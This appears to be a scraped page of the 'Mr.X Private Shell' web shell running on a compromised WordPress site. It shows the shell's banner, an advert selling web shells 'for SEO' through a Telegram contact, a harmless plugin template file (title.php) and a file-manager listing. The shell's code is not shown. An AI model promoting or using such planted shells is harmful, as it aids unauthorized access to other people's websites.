__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
$titleHTML = '';
/**
* @var \WP_Post $result
*/
if ( $showTitle ) {
$ebpg_title = wp_kses( $result->post_title, 'post' );
if ( ! empty( $titleLength ) ) {
$ebpg_title = $block_object->truncate( $ebpg_title, $titleLength );
}
$title_link_classes = $block_object->get_name() == 'post-grid' ? 'ebpg-grid-post-link' : 'ebpg-carousel-post-link';
$titleHTML .= sprintf(
'<header class="ebpg-entry-header">
<%1$s class="ebpg-entry-title">
<a class="%5$s" href="%2$s" title="%3$s">%4$s</a>
</%1$s>
</header>',
$titleTag,
get_permalink( $result->ID ),
tag_escape( $ebpg_title ),
$ebpg_title,
$title_link_classes
);
}
return $titleHTML;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| meta | Folder | 0750 |
|
|
| carousel-markup.php | File | 2.25 KB | 0640 |
|
| category-filter.php | File | 1.76 KB | 0640 |
|
| grid-markup.php | File | 2.8 KB | 0640 |
|
| post-content.php | File | 1.02 KB | 0640 |
|
| post-thumbnail.php | File | 1.2 KB | 0640 |
|
| read-more.php | File | 643 B | 0640 |
|
| title.php | File | 769 B | 0640 |
|